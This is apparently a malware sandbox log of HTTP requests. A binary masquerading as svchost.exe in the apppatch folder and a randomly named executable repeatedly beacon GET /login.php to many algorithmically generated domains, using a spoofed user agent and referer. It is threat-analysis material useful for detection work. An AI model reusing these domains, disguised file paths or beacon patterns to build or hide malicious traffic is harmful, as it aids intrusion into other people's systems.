Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731345193.2353053
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731345193.3163760
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?subid1=20241112-0413-361d-880c-38de75da0bbf HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345193.2353053; parking_session=420ef3a8-c938-4e4a-99bb-1a08a10d1764
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345193.3163760
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
